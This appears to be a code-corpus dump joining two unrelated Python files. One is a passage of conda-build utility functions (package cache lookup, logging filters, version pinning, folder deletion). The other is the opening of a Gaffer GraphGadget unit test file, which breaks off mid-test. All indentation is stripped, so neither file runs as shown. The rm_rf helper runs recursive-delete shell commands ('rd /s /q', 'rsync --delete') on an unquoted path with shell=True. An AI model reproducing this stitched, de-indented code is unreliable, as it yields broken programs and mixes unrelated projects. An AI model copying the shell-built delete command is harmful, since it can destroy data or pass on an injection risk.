"If exe is a Cygwin or MSYS2 executable then filters it through `cygpath -u`"
if sys.platform != 'win32':
return path
if exe not in _posix_exes_cache:
with open(exe, "rb") as exe_file:
exe_binary = exe_file.read()
msys2_cygwin = re.findall(b'(cygwin1.dll|msys-2.0.dll)', exe_binary)
_posix_exes_cache[exe] = True if msys2_cygwin else False
if _posix_exes_cache[exe]:
try:
path = check_output_env(['cygpath', '-u',
path]).splitlines()[0].decode(getpreferredencoding())
except WindowsError:
log = get_logger(__name__)
log.debug('cygpath executable not found. Passing native path. This is OK for msys2.')
return path
def get_skip_message(m):
return ("Skipped: {} from {} defines build/skip for this configuration ({}).".format(
m.name(), m.path,
{k: m.config.variant[k] for k in m.get_used_vars()}))
def package_has_file(package_path, file_path, refresh=False):
locks = get_conda_operation_locks()
possible_subdir = os.path.basename(os.path.dirname(package_path))
possible_subdir = possible_subdir if possible_subdir in DEFAULT_SUBDIRS else ''
with try_acquire_locks(locks, timeout=900):
folder_name = os.path.basename(conda_package_handling.api.get_default_extracted_folder(package_path))
# look in conda's package cache
try:
# conda 4.7.2 added this
cache_path = PackageCacheData.first_writable().pkgs_dir
except AttributeError:
# fallback; assume writable first path. Not as reliable.
cache_path = pkgs_dirs[0]
cache_path = os.path.join(cache_path, possible_subdir) if possible_subdir else cache_path
cache_path = os.path.join(cache_path, folder_name)
resolved_file_path = os.path.join(cache_path, file_path)
if not os.path.isfile(resolved_file_path) or refresh:
if file_path.startswith('info'):
conda_package_handling.api.extract(package_path, cache_path, 'info')
else:
conda_package_handling.api.extract(package_path, cache_path)
if not os.path.isfile(resolved_file_path):
return False
else:
try:
with open(resolved_file_path) as f:
content = f.read()
except UnicodeDecodeError:
with open(resolved_file_path, 'rb') as f:
content = f.read()
return content
def ensure_list(arg):
if (isinstance(arg, string_types) or not hasattr(arg, '__iter__')):
if arg is not None:
arg = [arg]
else:
arg = []
return arg
@contextlib.contextmanager
def tmp_chdir(dest):
curdir = os.getcwd()
try:
os.chdir(dest)
yield
finally:
os.chdir(curdir)
def expand_globs(path_list, root_dir):
files = []
for path in path_list:
if not os.path.isabs(path):
path = os.path.join(root_dir, path)
if os.path.isfile(path):
files.append(path)
elif os.path.islink(path):
files.append(path)
elif os.path.isdir(path):
files.extend(os.path.join(root, f) for root, _, fs in walk(path) for f in fs)
else:
# File compared to the globs use / as separator indenpendently of the os
glob_files = glob(path)
if not glob_files:
log = get_logger(__name__)
log.error('Glob {} did not match in root_dir {}'.format(path, root_dir))
files.extend(glob_files)
prefix_path_re = re.compile('^' + re.escape('%s%s' % (root_dir, os.path.sep)))
files = [prefix_path_re.sub('', f, 1) for f in files]
return files
def find_recipe(path):
"""recurse through a folder, locating meta.yaml. Raises error if more than one is found.
Returns folder containing meta.yaml, to be built.
If we have a base level meta.yaml and other supplemental ones, use that first"""
if os.path.isfile(path) and os.path.basename(path) in ["meta.yaml", "conda.yaml"]:
return os.path.dirname(path)
results = rec_glob(path, ["meta.yaml", "conda.yaml"])
if len(results) > 1:
base_recipe = os.path.join(path, "meta.yaml")
if base_recipe in results:
get_logger(__name__).warn("Multiple meta.yaml files found. "
"The meta.yaml file in the base directory "
"will be used.")
results = [base_recipe]
else:
raise IOError("More than one meta.yaml files found in %s" % path)
elif not results:
raise IOError("No meta.yaml or conda.yaml files found in %s" % path)
return results[0]
class LoggingContext(object):
default_loggers = ['conda', 'binstar', 'install', 'conda.install', 'fetch', 'conda.instructions',
'fetch.progress', 'print', 'progress', 'dotupdate', 'stdoutlog', 'requests',
'conda.core.package_cache', 'conda.plan', 'conda.gateways.disk.delete',
'conda_build', 'conda_build.index']
def __init__(self, level=logging.WARN, handler=None, close=True, loggers=None):
self.level = level
self.old_levels = {}
self.handler = handler
self.close = close
self.quiet = context.quiet
if not loggers:
self.loggers = LoggingContext.default_loggers
else:
self.loggers = loggers
def __enter__(self):
for logger in self.loggers:
if isinstance(logger, string_types):
log = logging.getLogger(logger)
self.old_levels[logger] = log.level
log.setLevel(self.level if ('install' not in logger or
self.level < logging.INFO) else self.level + 10)
if self.handler:
self.logger.addHandler(self.handler)
context.quiet = True
def __exit__(self, et, ev, tb):
for logger, level in self.old_levels.items():
logging.getLogger(logger).setLevel(level)
if self.handler:
self.logger.removeHandler(self.handler)
if self.handler and self.close:
self.handler.close()
context.quiet = self.quiet
# implicit return of None => don't swallow exceptions
def get_installed_packages(path):
'''
Scan all json files in 'path' and return a dictionary with their contents.
Files are assumed to be in 'index.json' format.
'''
installed = dict()
for filename in glob(os.path.join(path, 'conda-meta', '*.json')):
with open(filename) as file:
data = json.load(file)
installed[data['name']] = data
return installed
def _convert_lists_to_sets(_dict):
for k, v in _dict.items():
if hasattr(v, 'keys'):
_dict[k] = HashableDict(_convert_lists_to_sets(v))
elif hasattr(v, '__iter__') and not isinstance(v, string_types):
try:
_dict[k] = sorted(list(set(v)))
except TypeError:
_dict[k] = sorted(list(set(tuple(_) for _ in v)))
return _dict
class HashableDict(dict):
"""use hashable frozen dictionaries for resources and resource types so that they can be in sets
"""
def __init__(self, *args, **kwargs):
super(HashableDict, self).__init__(*args, **kwargs)
self = _convert_lists_to_sets(self)
def __hash__(self):
return hash(json.dumps(self, sort_keys=True))
def represent_hashabledict(dumper, data):
value = []
for item_key, item_value in data.items():
node_key = dumper.represent_data(item_key)
node_value = dumper.represent_data(item_value)
value.append((node_key, node_value))
return yaml.nodes.MappingNode(u'tag:yaml.org,2002:map', value)
yaml.add_representer(HashableDict, represent_hashabledict)
# http://stackoverflow.com/a/10743550/1170370
@contextlib.contextmanager
def capture():
import sys
oldout, olderr = sys.stdout, sys.stderr
try:
out = [StringIO(), StringIO()]
sys.stdout, sys.stderr = out
yield out
finally:
sys.stdout, sys.stderr = oldout, olderr
out[0] = out[0].getvalue()
out[1] = out[1].getvalue()
# copied from conda; added in 4.3, not currently part of exported functionality
@contextlib.contextmanager
def env_var(name, value, callback=None):
# NOTE: will likely want to call reset_context() when using this function, so pass
# it as callback
name, value = str(name), str(value)
saved_env_var = os.environ.get(name)
try:
os.environ[name] = value
if callback:
callback()
yield
finally:
if saved_env_var:
os.environ[name] = saved_env_var
else:
del os.environ[name]
if callback:
callback()
def trim_empty_keys(dict_):
to_remove = set()
negative_means_empty = ('final', 'noarch_python', 'zip_keys')
for k, v in dict_.items():
if hasattr(v, 'keys'):
trim_empty_keys(v)
# empty lists and empty strings, and None are always empty.
if v == list() or v == '' or v is None or v == dict():
to_remove.add(k)
# other things that evaluate as False may not be "empty" - things can be manually set to
# false, and we need to keep that setting.
if not v and k in negative_means_empty:
to_remove.add(k)
if 'zip_keys' in dict_ and not any(v for v in dict_['zip_keys']):
to_remove.add('zip_keys')
for k in to_remove:
del dict_[k]
def _increment(version, alpha_ver):
try:
if alpha_ver:
suffix = 'a'
else:
suffix = '.0a0'
last_version = str(int(version) + 1) + suffix
except ValueError:
last_version = chr(ord(version) + 1)
return last_version
def apply_pin_expressions(version, min_pin='x.x.x.x.x.x.x', max_pin='x'):
pins = [len(p.split('.')) if p else None for p in (min_pin, max_pin)]
parsed_version = VersionOrder(version).version[1:]
nesting_position = None
flat_list = []
for idx, item in enumerate(parsed_version):
if isinstance(item, list):
nesting_position = idx
flat_list.extend(item)
else:
flat_list.append(item)
if max_pin and len(max_pin.split('.')) > len(flat_list):
pins[1] = len(flat_list)
versions = ['', '']
# first idx is lower bound pin; second is upper bound pin.
# pin value is number of places to pin.
for p_idx, pin in enumerate(pins):
if pin:
# flat_list is the blown-out representation of the version
for v_idx, v in enumerate(flat_list[:pin]):
# upper bound pin
if p_idx == 1 and v_idx == pin - 1:
# is the last place an alphabetic character? OpenSSL, JPEG
alpha_ver = str(flat_list[min(pin, len(flat_list) - 1)]).isalpha()
v = _increment(v, alpha_ver)
versions[p_idx] += str(v)
if v_idx != nesting_position:
versions[p_idx] += '.'
if versions[p_idx][-1] == '.':
versions[p_idx] = versions[p_idx][:-1]
if versions[0]:
versions[0] = '>=' + versions[0]
if versions[1]:
versions[1] = '<' + versions[1]
return ','.join([v for v in versions if v])
def filter_files(files_list, prefix, filter_patterns=('(.*[\\\\/])?\.git[\\\\/].*',
'(.*[\\\\/])?\.git$',
'(.*)?\.DS_Store.*',
'.*\.la$',
'conda-meta.*',
'.*\.conda_trash(?:_\d+)*$')):
"""Remove things like the .git directory from the list of files to be copied"""
for pattern in filter_patterns:
r = re.compile(pattern)
files_list = set(files_list) - set(filter(r.match, files_list))
return [f for f in files_list
if not os.path.isdir(os.path.join(prefix, f)) or
os.path.islink(os.path.join(prefix, f))]
def filter_info_files(files_list, prefix):
return filter_files(files_list, prefix, filter_patterns=(
'info[\\\\/]index.json',
'info[\\\\/]files',
'info[\\\\/]paths.json',
'info[\\\\/]about.json',
'info[\\\\/]has_prefix',
'info[\\\\/]hash_input_files', # legacy, not used anymore
'info[\\\\/]hash_input.json',
'info[\\\\/]run_exports.yaml', # legacy
'info[\\\\/]run_exports.json', # current
'info[\\\\/]git',
'info[\\\\/]recipe[\\\\/].*',
'info[\\\\/]recipe_log.json',
'info[\\\\/]recipe.tar',
'info[\\\\/]test[\\\\/].*',
'info[\\\\/]LICENSE.txt', # legacy, some tests rely on this
'info[\\\\/]licenses[\\\\/]*',
'info[\\\\/]requires',
'info[\\\\/]meta',
'info[\\\\/]platform',
'info[\\\\/]no_link',
'info[\\\\/]link.json',
'info[\\\\/]icon.png',
))
def rm_rf(path, config=None):
if conda_46:
return _rm_rf(path)
if os.path.isdir(path):
try:
# subprocessing to delete large folders can be quite a bit faster
if on_win:
subprocess.check_call('rd /s /q {}'.format(path), shell=True)
else:
try:
os.makedirs('.empty')
except:
pass
del_dir_cmd = 'rsync -a --delete .empty {}/'
subprocess.check_call(del_dir_cmd.format(path).split())
try:
shutil.rmtree('.empty')
except:
pass
# we don't really care about errors that much. People can and should
# clean out their folders once in a while with "purge"
except:
pass
conda_log_level = logging.WARN
if config and config.debug:
conda_log_level = logging.DEBUG
with LoggingContext(conda_log_level):
# this clears out the path from conda's cache, which otherwise thinks
# that things are still installed here
_rm_rf(path)
# https://stackoverflow.com/a/31459386/1170370
class LessThanFilter(logging.Filter):
def __init__(self, exclusive_maximum, name=""):
super(LessThanFilter, self).__init__(name)
self.max_level = exclusive_maximum
def filter(self, record):
# non-zero return means we log this message
return 1 if record.levelno < self.max_level else 0
class GreaterThanFilter(logging.Filter):
def __init__(self, exclusive_minimum, name=""):
super(GreaterThanFilter, self).__init__(name)
self.min_level = exclusive_minimum
def filter(self, record):
# non-zero return means we log this message
return 1 if record.levelno > self.min_level else 0
# unclutter logs - show messages only once
class DuplicateFilter(logging.Filter):
def __init__(self):
self.msgs = set()
def filter(self, record):
log = record.msg not in self.msgs
self.msgs.add(record.msg)
return int(log)
dedupe_filter = DuplicateFilter()
info_debug_stdout_filter = LessThanFilter(logging.WARNING)
warning_error_stderr_filter = GreaterThanFilter(logging.INFO)
# set filelock's logger to only show warnings by default
logging.getLogger('filelock').setLevel(logging.WARN)
# quiet some of conda's less useful output
logging.getLogger('conda.core.linked_data').setLevel(logging.WARN)
logging.getLogger('conda.gateways.disk.delete').setLevel(logging.WARN)
logging.getLogger('conda.gateways.disk.test').setLevel(logging.WARN)
def reset_deduplicator():
"""Most of the time, we want the deduplication. There are some cases (tests especially)
where we want to be able to control the duplication."""
global dedupe_filter
dedupe_filter = DuplicateFilter()
def get_logger(name, level=logging.INFO, dedupe=True, add_stdout_stderr_handlers=True):
config_file = None
if cc_conda_build.get('log_config_file'):
config_file = abspath(expanduser(expandvars(cc_conda_build.get('log_config_file'))))
# by loading config file here, and then only adding handlers later, people
# should be able to override conda-build's logger settings here.
if config_file:
with open(config_file) as f:
config_dict = yaml.safe_load(f)
logging.config.dictConfig(config_dict)
level = config_dict.get('loggers', {}).get(name, {}).get('level', level)
log = logging.getLogger(name)
log.setLevel(level)
if dedupe:
log.addFilter(dedupe_filter)
# these are defaults. They can be overridden by configuring a log config yaml file.
if not log.handlers and add_stdout_stderr_handlers:
stdout_handler = logging.StreamHandler(sys.stdout)
stderr_handler = logging.StreamHandler(sys.stderr)
stdout_handler.addFilter(info_debug_stdout_filter)
stderr_handler.addFilter(warning_error_stderr_filter)
stdout_handler.setLevel(level)
stderr_handler.setLevel(level)
log.addHandler(stdout_handler)
log.addHandler(stderr_handler)
return log
def _equivalent(base_value, value, path):
equivalent = value == base_value
if isinstance(value, string_types) and isinstance(base_value, string_types):
if not os.path.isabs(base_value):
base_value = os.path.abspath(os.path.normpath(os.path.join(path, base_value)))
if not os.path.isabs(value):
value = os.path.abspath(os.path.normpath(os.path.join(path, value)))
equivalent |= base_value == value
return equivalent
def merge_or_update_dict(base, new, path="", merge=True, raise_on_clobber=False, add_missing_keys=True):
if base == new:
return base
log = get_logger(__name__)
for key, value in new.items():
if key in base or add_missing_keys:
base_value = base.get(key, value)
if hasattr(value, 'keys'):
base_value = merge_or_update_dict(base_value, value, path, merge,
raise_on_clobber=raise_on_clobber)
base[key] = base_value
elif hasattr(value, '__iter__') and not isinstance(value, string_types):
if merge:
if base_value != value:
try:
base_value.extend(value)
except (TypeError, AttributeError):
base_value = value
try:
base[key] = list(base_value)
except TypeError:
base[key] = base_value
else:
base[key] = value
else:
if (base_value and merge and not _equivalent(base_value, value, path) and
raise_on_clobber):
log.debug('clobbering key {} (original value {}) with value {}'.format(key,
base_value, value))
if value is None and key in base:
del base[key]
else:
base[key] = value
return base
def merge_dicts_of_lists(dol1, dol2):
'''
From Alex Martelli: https://stackoverflow.com/a/1495821/3257826
'''
keys = set(dol1).union(dol2)
no = []
return dict((k, dol1.get(k, no) + dol2.get(k, no)) for k in keys)
def prefix_files(prefix):
'''
Returns a set of all files in prefix.
'''
res = set()
prefix_rep = prefix + os.path.sep
for root, dirs, files in walk(prefix):
for fn in files:
# this is relpath, just hacked to be faster
res.add(join(root, fn).replace(prefix_rep, '', 1))
for dn in dirs:
path = join(root, dn)
if islink(path):
res.add(path.replace(prefix_rep, '', 1))
res.update(expand_globs((path, ), prefix))
return res
def mmap_mmap(fileno, length, tagname=None, flags=0, prot=mmap_PROT_READ | mmap_PROT_WRITE,
access=None, offset=0):
'''
Hides the differences between mmap.mmap on Windows and Unix.
Windows has `tagname`.
Unix does not, but makes up for it with `flags` and `prot`.
On both, the default value for `access` is determined from how the file
was opened so must not be passed in at all to get this default behaviour.
'''
if on_win:
if access:
return mmap.mmap(fileno, length, tagname=tagname, access=access, offset=offset)
else:
return mmap.mmap(fileno, length, tagname=tagname)
else:
if access:
return mmap.mmap(fileno, length, flags=flags, prot=prot, access=access, offset=offset)
else:
return mmap.mmap(fileno, length, flags=flags, prot=prot)
def remove_pycache_from_scripts(build_prefix):
"""Remove pip created pycache directory from bin or Scripts."""
if on_win:
scripts_path = os.path.join(build_prefix, 'Scripts')
else:
scripts_path = os.path.join(build_prefix, 'bin')
if os.path.isdir(scripts_path):
for entry in os.listdir(scripts_path):
entry_path = os.path.join(scripts_path, entry)
if os.path.isdir(entry_path) and entry.strip(os.sep) == '__pycache__':
shutil.rmtree(entry_path)
elif os.path.isfile(entry_path) and entry_path.endswith('.pyc'):
os.remove(entry_path)
def sort_list_in_nested_structure(dictionary, omissions=''):
"""Recurse through a nested dictionary and sort any lists that are found.
If the list that is found contains anything but strings, it is skipped
as we can't compare lists containing different types. The omissions argument
allows for certain sections of the dictionary to be omitted from sorting.
"""
for field, value in dictionary.items():
if isinstance(value, dict):
for key in value.keys():
section = dictionary[field][key]
if isinstance(section, dict):
sort_list_in_nested_structure(section)
elif (isinstance(section, list) and
'{}/{}' .format(field, key) not in omissions and
all(isinstance(item, str) for item in section)):
section.sort()
# there's a possibility for nested lists containing dictionaries
# in this case we recurse until we find a list to sort
elif isinstance(value, list):
for element in value:
if isinstance(element, dict):
sort_list_in_nested_structure(element)
try:
value.sort()
except TypeError:
pass
# group one: package name
# group two: version (allows _, +, . in version)
# group three: build string - mostly not used here. Match primarily matters
# to specify when not to add .*
# if you are seeing mysterious unsatisfiable errors, with the package you're building being the
# unsatisfiable part, then you probably need to update this regex.
spec_needing_star_re = re.compile(r"([\w\d\.\-\_]+)\s+((?<![><=])[\w\d\.\-\_]+?(?!\*))(\s+[\w\d\.\_]+)?$") # NOQA
spec_ver_needing_star_re = re.compile("^([0-9a-zA-Z\.]+)$")
def ensure_valid_spec(spec, warn=False):
if isinstance(spec, MatchSpec):
if (hasattr(spec, 'version') and spec.version and (not spec.get('build', '')) and
spec_ver_needing_star_re.match(str(spec.version))):
if str(spec.name) not in ('python', 'numpy') or str(spec.version) != 'x.x':
spec = MatchSpec("{} {}".format(str(spec.name), str(spec.version) + '.*'))
else:
match = spec_needing_star_re.match(spec)
# ignore exact pins (would be a 3rd group)
if match and not match.group(3):
if match.group(1) in ('python', 'numpy') and match.group(2) == 'x.x':
spec = spec_needing_star_re.sub(r"\1 \2", spec)
else:
if "*" not in spec:
if match.group(1) not in ('python', 'vc') and warn:
log = get_logger(__name__)
log.warn("Adding .* to spec '{}' to ensure satisfiability. Please "
"consider putting {{{{ var_name }}}}.* or some relational "
"operator (>/</>=/<=) on this spec in meta.yaml, or if req is "
"also a build req, using {{{{ pin_compatible() }}}} jinja2 "
"function instead. See "
"https://conda.io/docs/user-guide/tasks/build-packages/variants.html#pinning-at-the-variant-level" # NOQA
.format(spec))
spec = spec_needing_star_re.sub(r"\1 \2.*", spec)
return spec
def insert_variant_versions(requirements_dict, variant, env):
build_deps = (ensure_list(requirements_dict.get('build')) +
ensure_list(requirements_dict.get('host')))
reqs = ensure_list(requirements_dict.get(env))
for key, val in variant.items():
regex = re.compile(r'^(%s)(?:\s*$)' % key.replace('_', '[-_]'))
matches = [regex.match(pkg) for pkg in reqs]
if any(matches):
for i, x in enumerate(matches):
if x and (env in ('build', 'host') or x.group(1) in build_deps):
del reqs[i]
if not isinstance(val, string_types):
val = val[0]
reqs.insert(i, ensure_valid_spec(' '.join((x.group(1), val))))
xx_re = re.compile("([0-9a-zA-Z\.\-\_]+)\s+x\.x")
matches = [xx_re.match(pkg) for pkg in reqs]
if any(matches):
for i, x in enumerate(matches):
if x:
del reqs[i]
reqs.insert(i, ensure_valid_spec(' '.join((x.group(1), variant.get(x.group(1))))))
if reqs:
requirements_dict[env] = reqs
def match_peer_job(target_matchspec, other_m, this_m=None):
"""target_matchspec comes from the recipe. target_variant is the variant from the recipe whose
deps we are matching. m is the peer job, which must satisfy conda and also have matching keys
for any keys that are shared between target_variant and m.config.variant"""
match_dict = {'name': other_m.name(),
'version': other_m.version(),
'build': '', }
if conda_43:
match_dict = Dist(name=match_dict['name'],
dist_name='-'.join((match_dict['name'],
match_dict['version'],
match_dict['build'])),
version=match_dict['version'],
build_string=match_dict['build'],
build_number=int(other_m.build_number() or 0),
channel=None)
matchspec_matches = target_matchspec.match(match_dict)
variant_matches = True
if this_m:
other_m_used_vars = other_m.get_used_loop_vars()
for v in this_m.get_used_loop_vars():
if v in other_m_used_vars:
variant_matches &= this_m.config.variant[v] == other_m.config.variant[v]
return matchspec_matches and variant_matches
def expand_reqs(reqs_entry):
if not hasattr(reqs_entry, 'keys'):
original = ensure_list(reqs_entry)[:]
reqs_entry = {'host': ensure_list(original),
'run': ensure_list(original)} if original else {}
else:
for sec in reqs_entry:
reqs_entry[sec] = ensure_list(reqs_entry[sec])
return reqs_entry
def sha256_checksum(filename, buffersize=65536):
if not isfile(filename):
return None
sha256 = hashlib.sha256()
with open(filename, 'rb') as f:
for block in iter(lambda: f.read(buffersize), b''):
sha256.update(block)
return sha256.hexdigest()
def write_bat_activation_text(file_handle, m):
if conda_46:
file_handle.write('call "{conda_root}\\..\\condabin\\conda_hook.bat"\n'.format(
conda_root=root_script_dir,
))
if m.is_cross:
# HACK: we need both build and host envs "active" - i.e. on PATH,
# and with their activate.d scripts sourced. Conda only
# lets us activate one, though. This is a
# vile hack to trick conda into "stacking"
# two environments.
#
# Net effect: binaries come from host first, then build
#
# Conda 4.4 may break this by reworking the activate scripts.
# ^^ shouldn't be true
# In conda 4.4, export CONDA_MAX_SHLVL=2 to stack envs to two
# levels deep.
# conda 4.4 does require that a conda-meta/history file
# exists to identify a valid conda environment
# conda 4.6 changes this one final time, by adding a '--stack' flag to the 'activate'
# command, and 'activate' does not stack environments by default without that flag
history_file = join(m.config.host_prefix, 'conda-meta', 'history')
if not isfile(history_file):
if not isdir(dirname(history_file)):
os.makedirs(dirname(history_file))
open(history_file, 'a').close()
if conda_46:
file_handle.write('call "{conda_root}\\..\\condabin\\conda.bat" activate "{prefix}"\n'.format(
conda_root=root_script_dir,
prefix=m.config.host_prefix,
))
else:
file_handle.write('call "{conda_root}\\activate.bat" "{prefix}"\n'.format(
conda_root=root_script_dir,
prefix=m.config.host_prefix))
# removing this placeholder should make conda double-activate with conda 4.3
file_handle.write('set "PATH=%PATH:CONDA_PATH_PLACEHOLDER;=%"\n')
file_handle.write('set CONDA_MAX_SHLVL=2\n')
# Write build prefix activation AFTER host prefix, so that its executables come first
if conda_46:
file_handle.write('call "{conda_root}\\..\\condabin\\conda.bat" activate --stack "{prefix}"\n'.format(
conda_root=root_script_dir,
prefix=m.config.build_prefix,
))
else:
file_handle.write('call "{conda_root}\\activate.bat" "{prefix}"\n'.format(
conda_root=root_script_dir,
prefix=m.config.build_prefix))
channeldata_cache = {}
def download_channeldata(channel_url):
global channeldata_cache
if channel_url.startswith('file://') or channel_url not in channeldata_cache:
urls = get_conda_channel(channel_url).urls()
urls = set(url.rsplit('/', 1)[0] for url in urls)
data = {}
for url in urls:
with TemporaryDirectory() as td:
tf = os.path.join(td, "channeldata.json")
try:
download(url + '/channeldata.json', tf)
with open(tf) as f:
new_channeldata = json.load(f)
except (JSONDecodeError, CondaHTTPError):
new_channeldata = {}
merge_or_update_dict(data, new_channeldata)
channeldata_cache[channel_url] = data
else:
data = channeldata_cache[channel_url]
return data
|
GraphGadgetTest.py | ##########################################################################
#
# Copyright (c) 2011-2012, John Haddon. All rights reserved.
# Copyright (c) 2011-2013, Image Engine Design Inc. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above
# copyright notice, this list of conditions and the following
# disclaimer.
#
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following
# disclaimer in the documentation and/or other materials provided with
# the distribution.
#
# * Neither the name of John Haddon nor the names of
# any other contributors to this software may be used to endorse or
# promote products derived from this software without specific prior
# written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS
# IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,
# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR
# CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
# EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
# PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR
# PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF
# LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING
# NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
##########################################################################
import unittest
import threading
import imath
import IECore
import Gaffer
import GafferUI
import GafferTest
import GafferUITest
class NestedPlugTestNode( Gaffer.Node ) :
def __init__( self ) :
Gaffer.Node.__init__( self )
IECore.registerRunTimeTyped( NestedPlugTestNode )
Gaffer.Metadata.registerValue( NestedPlugTestNode, "c", "nodule:type", "GafferUI::CompoundNodule" )
class GraphGadgetTest( GafferUITest.TestCase ) :
def testRemovedNodesDontHaveGadgets( self ) :
s = Gaffer.ScriptNode()
g = GafferUI.GraphGadget( s )
n = GafferTest.AddNode()
s["add1"] = n
self.assertIsNotNone( g.nodeGadget( n ) )
s.deleteNodes( filter = Gaffer.StandardSet( [ n ] ) )
self.assertIsNone( g.nodeGadget( n ) )
def testRemovedNodesDontHaveConnections( self ) :
s = Gaffer.ScriptNode()
n = GafferTest.AddNode()
s["add1"] = n
s["add2"] = GafferTest.AddNode()
s["add1"]["op1"].setInput( s["add2"]["sum"] )
g = GafferUI.GraphGadget( s )
s.deleteNodes( filter = Gaffer.StandardSet( [ s["add1"] ] ) )
self.assertIsNone( g.connectionGadget( n["op1"] ) )
def testCreateWithFilter( self ) :
script = Gaffer.ScriptNode()
script["add1"] = GafferTest.AddNode()
script["add2"] = GafferTest.AddNode()
nodeFilter = Gaffer.StandardSet( [ script["add2"] ] )
g = GafferUI.GraphGadget( script, nodeFilter )
self.assertIsNone( g.nodeGadget( script["add1"] ) )
self.assertIsNotNone( g.nodeGadget( script["add2"] ) )
def testEditFilter( self ) :
script = Gaffer.ScriptNode()
script["add1"] = GafferTest.AddNode()
script["add2"] = GafferTest.AddNode()
nodeFilter = Gaffer.StandardSet( script.children() )
g = GafferUI.GraphGadget( script, nodeFilter )
self.assertIsNotNone( g.nodeGadget( script["add1"] ) )
self.assertIsNotNone( g.nodeGadget( script["add2"] ) )
nodeFilter.remove( script["add1"] )
self.assertIsNone( g.nodeGadget( script["add1"] ) )
self.assertIsNotNone( g.nodeGadget( script["add2"] ) )
nodeFilter.remove( script["add2"] )
self.assertIsNone( g.nodeGadget( script["add1"] ) )
self.assertIsNone( g.nodeGadget( script["add2"] ) )
nodeFilter.add( script["add1"] )
self.assertIsNotNone( g.nodeGadget( script["add1"] ) )
self.assertIsNone( g.nodeGadget( script["add2"] ) )
nodeFilter.add( script["add2"] )
self.assertIsNotNone( g.nodeGadget( script["add1"] ) )
self.assertIsNotNone( g.nodeGadget( script["add2"] ) )
def testUnhidingConnectedDstNodes( self ) :
script = Gaffer.ScriptNode()
script["add1"] = GafferTest.AddNode()
script["add2"] = GafferTest.AddNode()
script["add2"]["op1"].setInput( script["add1"]["sum"] )
nodeFilter = Gaffer.StandardSet( [ script["add1"] ] )
g = GafferUI.GraphGadget( script, nodeFilter )
self.assertIsNotNone( g.nodeGadget( script["add1"] ) )
self.assertIsNone( g.nodeGadget( script["add2"] ) )
self.assertIsNone( g.connectionGadget( script["add2"]["op1"] ) )
nodeFilter.add( script["add2"] )
self.assertIsNotNone( g.nodeGadget( script["add1"] ) )
self.assertIsNotNone( g.nodeGadget( script["add2"] ) )
self.assertIsNotNone( g.connectionGadget( script["add2"]["op1"] ) )
def testCreatingWithHiddenSrcNodes( self ) :
script = Gaffer.ScriptNode()
script["add1"] = GafferTest.AddNode()
script["add2"] = GafferTest.AddNode()
script["add2"]["op1"].setInput( script["add1"]["sum"] )
nodeFilter = Gaffer.StandardSet( [ script["add2"] ] )
g = GafferUI.GraphGadget( script, nodeFilter )
self.assertIsNone( g.nodeGadget( script["add1"] ) )
self.assertIsNotNone( g.nodeGadget( script["add2"] ) )
c = g.connectionGadget( script["add2"]["op1"] )
self.assertIsNotNone( c )
self.assertTrue( c.dstNodule().plug().isSame( script["add2"]["op1"] ) )
self.assertEqual( c.srcNodule(), None )
def testHidingConnectedDstNodes( self ) :
script = Gaffer.ScriptNode()
script["add1"] = GafferTest.AddNode()
script["add2"] = GafferTest.AddNode()
script["add2"]["op1"].setInput( script["add1"]["sum"] )
nodeFilter = Gaffer.StandardSet( script.children() )
g = GafferUI.GraphGadget( script, nodeFilter )
self.assertIsNotNone( g.nodeGadget( script["add1"] ) )
self.assertIsNotNone( g.nodeGadget( script["add2"] ) )
self.assertIsNotNone( g.connectionGadget( script["add2"]["op1"] ) )
nodeFilter.remove( script["add2"] )
self.assertIsNotNone( g.nodeGadget( script["add1"] ) )
self.assertIsNone( g.nodeGadget( script["add2"] ) )
self.assertIsNone( g.connectionGadget( script["add2"]["op1"] ) )
def testHidingConnectedSrcNodes( self ) :
script = Gaffer.ScriptNode()
script["add1"] = GafferTest.AddNode()
script["add2"] = GafferTest.AddNode()
script["add2"]["op1"].setInput( script["add1"]["sum"] )
nodeFilter = Gaffer.StandardSet( [ script["add1"], script["add2"] ] )
g = GafferUI.GraphGadget( script, nodeFilter )
self.assertIsNotNone( g.nodeGadget( script["add1"] ) )
self.assertIsNotNone( g.nodeGadget( script["add2"] ) )
c = g.connectionGadget( script["add2"]["op1"] )
self.assertIsNotNone( c )
self.assertTrue( c.srcNodule().plug().isSame( script["add1"]["sum"] ) )
self.assertTrue( c.dstNodule().plug().isSame( script["add2"]["op1"] ) )
nodeFilter.remove( script["add1"] )
self.assertIsNone( g.nodeGadget( script["add1"] ) )
c = g.connectionGadget( script["add2"]["op1"] )
self.assertIsNotNone( c )
self.assertIsNone( c.srcNodule() )
self.assertTrue( c.dstNodule().plug().isSame( script["add2"]["op1"] ) )
def testConnectingInvisibleDstNodes( self ) :
script = Gaffer.ScriptNode()
script["add1"] = GafferTest.AddNode()
script["add2"] = GafferTest.AddNode()
nodeFilter = Gaffer.StandardSet( [ script["add1"] ] )
g = GafferUI.GraphGadget( script, nodeFilter )
self.assertIsNotNone( g.nodeGadget( script["add1"] ) )
self.assertIsNone( g.nodeGadget( script["add2"] ) )
script["add2"]["op1"].setInput( script["add1"]["sum"] )
self.assertIsNotNone( g.nodeGadget( script["add1"] ) )
self.assertIsNone( g.nodeGadget( script["add2"] ) )
self.assertIsNone( g.connectionGadget( script["add2"]["op1"] ) )
def testConnectingHiddenDstNodes( self ) :
script = Gaffer.ScriptNode()
script["add1"] = GafferTest.AddNode()
